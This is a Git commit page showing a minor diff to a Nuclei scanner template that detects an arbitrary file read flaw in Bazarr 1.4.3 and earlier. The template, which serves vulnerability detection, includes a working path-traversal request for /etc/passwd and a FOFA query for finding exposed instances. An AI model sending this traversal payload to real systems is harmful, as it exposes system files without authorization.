daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

minor-update

main
Dhiyaneshwaran 2024-07-21 14:21:48 +05:30 committed by GitHub
parent 2b4706defe
commit 3c9ba8908b
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 3 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml
View File

@ -7,13 +7,14 @@ info:
description: |
Bazarr 1.4.3 and earlier versions have a arbitrary file read vulnerability.
reference:
- https://github.com/4rdr/proofs/blob/d70b285245ac6e6efc71aa82c4aac8a4c615c29f/info/Bazaar_1.4.3_File_Traversal_via_Filename.md
- https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md
- https://www.bazarr.media/
metadata:
vendor: morpheus65535
product: bazarr
fofa-query: title=="Bazarr" && icon_hash="-1983413099"
tags: bazarr,lfi
flow: http(1) && http(2)
http:
@ -23,6 +24,7 @@ http:
matchers:
- type: word
part: body
words:
- '<title>Bazarr</title>'
internal: true
@ -32,7 +34,6 @@ http:
GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex